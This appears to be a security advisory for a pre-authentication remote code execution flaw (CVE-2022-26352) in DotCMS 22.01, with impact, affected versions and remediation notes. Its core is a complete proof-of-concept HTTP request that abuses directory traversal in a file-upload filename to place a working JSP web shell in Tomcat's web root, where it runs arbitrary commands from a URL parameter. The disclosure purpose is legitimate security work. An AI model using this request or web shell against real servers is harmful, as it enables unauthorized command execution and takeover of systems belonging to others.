Summary
A pre-auth remote code execution vulnerability was found in DotCMS
which was achievable by performing a directory traversal attack during file upload. This vulnerability ultimately allows attacker to execute arbitrary commands on the underlying system.
This vulnerability is exploitable with the default configuration of DotCMS and was tested on version 22.01.
The CVE for this issue is CVE-2022-26352
. The advisory from DotCMS
can be found here.
Impact
An attacker can upload arbitrary files to the system. By uploading a JSP file to the tomcat’s root directory, it is possible to achieve code execution, leading to command execution. An attacker can ultimately execute arbitrary commands on the underlying system.
Affected Software
The vulnerability was confirmed on 22.01 and below. This vulnerability may also work on 22.02, however this has not been confirmed.
Product Description
dotCMS
is an open source content management system written in Java for managing content and content driven sites and applications.
Solution
The remediation details provided from DotCMS’s advisory are satisfactory and will ensure that this vulnerabilty cannot be exploited.
The knowledge base article detailing the patches or workaround to apply can be found here.
Vulnerabilities
POST /api/content/ HTTP/1.1
Host: re.local:8443
User-Agent: curl/7.64.1
Accept: */*
Content-Length: 1162
Content-Type: multipart/form-data; boundary=------------------------aadc326f7ae3eac3
Connection: close
--------------------------aadc326f7ae3eac3
Content-Disposition: form-data; name="name"; filename="../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/html/js/dojo/a.jsp"
Content-Type: text/plain
<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p;
if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1){
p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd"));
}
else{
p = Runtime.getRuntime().exec(request.getParameter("cmd"));
}
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
--------------------------aadc326f7ae3eac3--
Blog Post
The blog post detailing the steps taken for the discovery of this vulnerability can be found here.
Other Poc
Fingerprint working with
Shodan
Ref :
https://github.com/rapid7/metasploit-framework/issues/16522
https://blog.assetnote.io/2022/05/03/dotcms-rce-advisory/